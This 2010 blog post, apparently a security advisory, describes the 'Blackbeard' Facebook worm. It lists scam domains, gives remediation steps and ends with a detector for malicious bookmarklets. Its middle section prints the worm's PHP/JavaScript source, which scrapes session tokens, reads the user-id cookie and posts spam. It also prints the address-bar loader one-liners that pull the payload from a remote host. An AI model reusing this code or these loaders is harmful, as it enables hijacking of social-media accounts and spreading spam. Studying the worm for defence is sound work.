
Facebook Revolving image Scam script : Facebook Blackbeard worm

Posted 28 Nov 2010

You might have seen the latest revolving images scam, in which your friends post messages with a link on your Facebook wall. We have covered some Facebook scams earlier, but this one is far more dangerous than the previous one, as it gives your personalized email address for Facebook updates to the hacker. The worm has been codenamed Blackbeard by the group of hackers, and they are continuously improving their script. Earlier it only posted Facebook updates on your wall and wrote on other people's walls, but now it also makes you a fan of some Facebook pages.

Really cool Facebook revolving images. MUST SEE http://rotatingimage2.tk/ .


You might also get several versions of this message :

Hi Frends, Just See Facebook Images Revolve!! WOW Its Amazing :) see here >>http://fbookcoolimages.tk/

Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/

Some other domains that are used for spreading this Facebook worm are :

  • http://revolvingimages.info/fb/
  • http://kewlpics.tk/
  • http://itsmajic.tk/
  • http://bit.ly/91wrzd
  • http://bit.ly/faceb00ked
  • http://majicalimages.tk/


Reasons behind the problem:

Most people are running this JavaScript while they are logged in to Facebook:

javascript:(a=(b=document).createElement("script")).src="hackingjavascriptlink",b.body.appendChild(a);void(0)

Consequences of running the JavaScript on your profile:

  • It will update your Facebook status, post on your friends' walls, and spread the link to the scam website.
  • The hacker will gain access to your personalized email address (something like 1233bhjkkoo@m.facebook.com) through which you update your Facebook status. Since sending an email to this address updates your Facebook status at any time, the hacker can update your Facebook wall as long as you don't change the address.
  • Please remember that after running the JavaScript, the hacker won't be getting your user ID or password.
  • You will also automatically like some Facebook fan pages as a result of running it.

Here's the solution if you were affected by the worm:

  • You need to refresh your personalized email address so that the hacker no longer has access to your Facebook wall.
  • Go to Facebook Mobile from here: http://www.facebook.com/mobile/ .
  • Scroll down to "Upload via email" and you will find an email address; that's the address the hacker is using to update your Facebook account.
  • Click on "Find out more".
  • After this step you will find something like this:

  • So, now refresh your personalized email address.
  • Since you might also have liked some random Facebook pages, remove them manually by going through the tutorial we gave earlier for another Facebook scam. You can also run a security scan on your Facebook feed to check whether anyone has sent you a malicious link.

We have also got the latest version of the source code used by these guys, but we are deleting some versions of it for safety purposes:

<?php
header("Content-type: text/javascript");
if(isset($_GET['show'])){
    if(!isset($_SERVER['HTTP_REFERER'])) header("Location: http://www.facebook.com/");
    if(!preg_match("/facebook.com/", $_SERVER['HTTP_REFERER'], $isit)) header("Location: http://www.facebook.com/");
    echo <<<_HTML_

// script name : blackbeard
// author : Yash n friends
// be nice and dont remove credits ...

txt="msg1";  // Msg 1 to be spammed
txtee="msg2";   // msg 2 to be spammed
sitename="http://youtwebsite.com/themes/"; // your site name... must include / at end
nextfile="next.php"; // your log filename
yourpageid="101059326616167"; // your fanpage id
llimit=15; // number of ppl to spam (15 is a good limit)

//DONT EDIT BELOW THIS LINE
// Skip to last line and edit link in script
//==========================

alert("Please wait 2-3 mins while we process! Do not refresh this window or click any link.");
i = 0;
with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {

    if (x.readyState == 4 && x.status == 200) {

        comp = (z = x.responseText).match(/name=\\\\"composer_id\\\\" value=\\\\"([\d\w]+)\\\\"/i)[1];
        form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
        pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        appid = "150622878317085";
        appname = "rip_m_j";

                t = setInterval(function () {
                    if (i >= llimit ) return;

if(i%2==0)
{
//update

with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] +
"&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id="
+ comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form +
"&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");

}
else
{
//update

with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type",
"application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] +
"&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp +
"&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt +
"&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");

}

                    i += 1;
                }, 2000);
            }

        }, send(null);
    }
}, send(null);

_HTML_;
    exit;
}else{
    echo <<<_HTML_
Run this script in addressbar for free facebook themes: <br>
javascript:(a = (b = document).createElement("script")).src = "//youtwebsite.com/themes/index.php?show", b.body.appendChild(a); void(0)
_HTML_;
}
?>

Also, if you really want to revolve the images of any page, you can use this simple JavaScript:

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24;   x4=300; y4=200; x5=300; y5=200;  DI=document.getElementsByTagName("img");
DIL=DI.length; function  A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style;  DIS.position='absolute';  DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px";
DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5);   void(0);

On a new note, some guys are a bit more clever and are using it under a different name, like "change your Facebook theme" or something similar. So it's better that you don't run JavaScript on Facebook unless you yourself know what is contained in it.
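One way to check what a "paste this in your address bar" snippet contains before anyone runs it. This is an added example, not part of the original post or of the worm's code. It statically flags the loader pattern quoted above (create a script element, point its src at another site, append it to the page). The function name and verdict strings are hypothetical, and the revolve sample is a shortened, constructed form of the image script above.

```javascript
// Added example: static triage of a snippet someone asks you to paste into the
// address bar. Function and verdict names are hypothetical, not from the post.

// Samples: the two loader one-liners quoted on this page, plus a shortened,
// constructed form of the harmless image-revolving bookmarklet.
const SAMPLES = {
  loader: 'javascript:(a=(b=document).createElement("script")).src="hackingjavascriptlink",b.body.appendChild(a);void(0)',
  themes: 'javascript:(a = (b = document).createElement("script")).src = "//youtwebsite.com/themes/index.php?show", b.body.appendChild(a); void(0)',
  revolve: 'javascript:R=0;DI=document.getElementsByTagName("img");function A(){for(i=0;i-DI.length;i++){DI[i].style.left=(Math.sin(R+i)*300+300)+"px"}R++}setInterval("A()",5);void(0);',
};

function triageBookmarklet(text) {
  const input = String(text).trim();
  if (!/^javascript:/i.test(input)) {
    return { verdict: "not-a-javascript-uri", remoteSrc: null, reasons: [] };
  }
  let body = input.replace(/^javascript:/i, "");
  try {
    body = decodeURIComponent(body); // browsers percent-decode javascript: URLs, so do the same
  } catch (e) {
    // malformed escapes: analyse the raw text instead
  }
  const reasons = [];
  const createsScript = /createElement\s*\(\s*["']script["']\s*\)/i.test(body);
  const src = body.match(/\.src\s*=\s*["']([^"']+)["']/i);
  if (createsScript) reasons.push("creates a <script> element");
  if (src) reasons.push("sets src to " + src[1]);
  if (/\.(appendChild|insertBefore)\s*\(/.test(body)) reasons.push("inserts a node into the page");
  // Things the fetched Blackbeard payload does; flagged if they appear inline too.
  if (/document\.cookie/.test(body)) reasons.push("reads document.cookie");
  if (/XMLHttpRequest|fetch\s*\(/.test(body)) reasons.push("sends background requests");

  let verdict = "no-loader-found"; // only means this check found nothing, not that the snippet is safe
  if (createsScript && src) verdict = "remote-script-loader";
  else if (reasons.length > 0) verdict = "needs-review";
  return { verdict, remoteSrc: src ? src[1] : null, reasons };
}

for (const [name, text] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(triageBookmarklet(text)));
}
```

A "remote-script-loader" verdict means the visible one-liner tells you nothing about what will run: the real code is whatever the remote server returns at that moment. The check is a plain pattern match, so an obfuscated snippet can slip past it.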





Author:Varun Dave